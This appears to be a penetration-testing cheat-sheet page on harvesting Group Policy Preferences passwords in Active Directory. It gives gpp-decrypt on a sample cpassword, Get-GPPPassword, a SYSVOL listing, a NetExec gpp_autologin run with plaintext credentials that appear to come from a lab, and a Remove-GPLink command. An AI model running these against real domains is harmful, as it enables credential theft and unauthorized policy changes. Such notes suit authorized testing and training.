For the complete documentation index, see llms.txt. This page is also available as Markdown.

Group Policy Preferences (GPP)

  • GROUPS.XML - Patched in 2014, still able to find domains where this exists

  • cpassword - AES encrypted but they can be decrypted with Microsofts private key

gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE

Find GPP Passwords

# PowerSploit module
Get-GPPPassword.ps1
  • https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1

Check SYSVOL Scripts

ls \\<dc>\SYSVOL\<DOMAIN>\scripts

CRACKMAPEXEC

nxc smb -L | grep gpp
  • Using NetExec's gpp_autologin Module

nxc smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin

Remove-GPLink -Name "MGMTTestGPO" -Target "CN=Default-First-Site-Name,cn=Sites,CN=Configuration,DC=MGMT,DC=EVERGREENHEALTH,DC=SYS"

Last updated